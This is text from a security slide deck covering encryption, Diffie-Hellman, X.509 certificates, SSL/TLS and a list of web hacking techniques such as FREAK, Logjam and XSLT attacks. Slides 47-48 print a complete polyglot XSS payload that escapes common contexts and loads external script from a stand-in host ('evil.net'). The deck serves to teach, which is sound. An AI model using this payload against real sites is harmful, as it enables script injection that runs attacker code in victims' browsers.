Basic security principles for information systems development/deployment. Information security is concerned with the confidentiality, integrity, and availability of information. From these three 'pillars', the following principles must be applied when implementing and maintaining an information system: Accountability.
6. What is Encryption?
➢ It is a process of making data unrecognizable
➢ Unless you have “key” to unlocking the data.
➢ Without the key, it should be imposable or more commonly
unfeasible to read the data in a reasonable timeframe.
7. Type of Encryption
Security Algorithms
Symmetric Algorithms Asymmetric Algorithms
• DES
• Blowfish
• RC5
• 3DES
• AES
• RSA
• DSA
• Diffie-Hellman
• El Gamal
9. What is Diffie-Hellman?
• A public key algorithm
• Only for key exchange
• Does not encrypt or decrypt
• Based of discrete logarithms
• Widely used in security protocols and commercial products
• Williamson of Britain's CESG claims to have discovered it
several years prior to 1976
14. Brief overview of X.509 certificate
An SSL/TLS X.509 certificate is a digital file that's usable for Secure
Sockets Layer (SSL) or Transport Layer Security (TLS).
Services:
1) An X.509 certificate is a public key + an identity of party +
signed by a certificate authority or self-signed.
2) In other words, X.509 certificate is a digital certificate that uses
X.509 public key infrastructure (PKI) standard to verify that a
public key belongs to the user, computer or service identity.
Verification has been done by CAs.
3) Party uses public key for secure communication, and trust CA to
adequately verify the identities of the party to which it issues
certificates.
** CA = Certification Authority
15. X.509 Authentication Procedure
X.509 includes three alternative authentication procedure:
1) One-way authentication
2) Two-way authentication
3) Three-way authentication
All use public-key signatures.
16. Contents of an X.509 certificate
Field Meaning
Version Which version of X.509
Serial
number
This number plus the CA's name uniquely
identifies the certificate
Signature
algorithm
The algorithm used to sign the certificate
Issuer X.500 name of the CA
Validity
period
The starting and ending times of the validity
period
Subject
name
The entity whose key is being certified
Public key The subject's public key and the ID of the
algorithm using it
Issuer ID An optional ID uniquely identifying the
certificate's issuer
Subject ID An optional ID uniquely identifying the
certificate's subject
Extensions Many extensions have been defined
Signature The certificate's signature (signed by the CA's
private key)
17. What is Certificates?
➢ Digital Certificates are a way of trying to prove that the
security “key” they contain actually belong to the person
they were issued to.
➢ This is done via a trusted third party that both parties in
communication can rely on.
19. SSL
➢ Stands for “Secure Socket Layer”
➢ A cryptographic protocol (A set of agreed rules for coding and
decoding messages so as to keep those messages secure)
➢ Each version was replaced by another version due to security
flaws and now is completely deprecated in June-2015
➢ Its death knell was the block cipher attack used by Poodle
➢ Replaced by...
21. TLS
➢ “Transport Layer Security”
➢ Like SSL it is cryptographic protocol
➢ The successor to SSL (TLS 1.0 is actually SSL 3.1 but was renamed to
mark the change to an open standard rather than Netscape's protocol)
➢ Currently has 3 versions 1.0, 1.1, 1.2 (1.3 in Draft)
➢ Like SSL it is a constantly changing protocol
23. Whose are Hackers?
A “Hacker” is a skilled programmer who is
expertise in machine code and operating
systems.
24. Hackers are categorized into
three main types
• White Hat Hackers
• Gray Hat Hackers
• Black Hat Hackers
25. Top 10 web hacking
techniques
1. FREAK (Factoring Attack on RSA-Export Keys)
2. LogJam
3. Web Timing Attacks Made Practical
4. Evading All* WAF XSS Filters
5. Abusing CDN’s with SSRF Flash and DNS
6. IllusoryTLS
7. Exploiting XXE in File Parsing Functionality
8. Abusing XLST for Practical Attacks
9. Magic Hashes
10. Hunting Asynchronous Vulnerabilities
26.
27. FREAK (Factoring Attack on RSA-Export
Keys)
FREAK is a weakness in some implementations
of SSL/TLS that may allow an attacker to
decrypt secure communications
between vulnerable clients
and servers.
32. Logjam is a security vulnerability against a Diffie–Hellman key
exchange ranging from 512-it (US export-grade) to 1024-bit keys.
33.
34. Web Timing Attacks Made
Practical1. A Web Timing Attack is a side channel attack in which the
hacker attempts to settle a cryptosystem by analyzing the time
taken to execute cryptographic algorithms.
2. Every logical operation takes some time to get executed, which
can differ based on the input. With precise measurements of
the time for each operation, an attacker can work backward to
the input.
44. Abusing XSLT for Practical
Attacks
Security researcher Fernando Arnaboldi illustrated the
different reasons of XSLT Attacks at the Black Hat
conference for the first time. The vulnerability in XSLT
was known for a long time. XSLT converts XML
documents into other XML documents, or other
formats such as HTML for web pages, plain text or XSL.
It may lead to security issues like Denial of Service
Attacks, Cross-Site Attacks etc. It can lead to
threatening the integrity and confidentiality of user
information.
45. Hunting Asynchronous Vulnerability
There are a number of asynchronous vulnerabilities which are not
visible to a vulnerable client like error messages, async calls etc. Many
asynchronous vulnerabilities are invisible.
That is, there's no way to:
• Trigger error messages
• Cause differences in application output
• Cause detectable time delays
46. Hunting Asynchronous Vulnerability
Invisible vulnerabilities can be roughly grouped into three types:
• Server-side vulnerabilities in processing that occurs in a background
thread, such as a shell command injection in a nightly cronjob or SQLi
in a queued transaction. Here, a crafted payload might trigger a time
delay, but the delay would only affect a background thread so it
wouldn't be detectable.
• Blind vulnerabilities that are triggered by a secondary event, such as
blind XSS and some second order SQLi. Detection of these issues
using normal techniques is possible but often tricky and error-prone.
• Vulnerabilities where there is no way to cause a difference in
application output, and the technology doesn't support anything that
can be used to cause a reliable time delay. For example, blind XXE or
XPath injection.
47. Evading All* WAF XSS Filters
As with shell command injection, it's easy to use XSS to trigger a pingback,
but we don't know what the syntax surrounding our input will be - we
might be landing inside a quoted attribute, or a <script> block, etc. We
also don't know which characters may be filtered or encoded.
Gareth Heyes crafted a superb payload to work in most common contexts.
First it breaks out of script context and opens an SVG event handler:
</script><svg/onload=
Then it breaks out of single-quoted attribute, double-quoted attribute,
and single/double quoted JavaScript literal contexts:
'+/"/+/onmouseover=1/
48. Evading All* WAF XSS Filters
After this point everything is executed as JavaScript, so it's just a matter of
importing an external JavaScript file, and grabbing a stack trace to help
track down the issue afterwards:
+(s=document.createElement(/script/.source),
s.stack=Error().stack,
s.src=(/,/+/evil.net/).slice(2),
document.documentElement.appendChild(s))//’>
Burp Suite will be using this payload as part of its active scanner within the
next few months. If you're impatient, check out the Sleepy Puppy blind
XSS framework recently released by Netflix.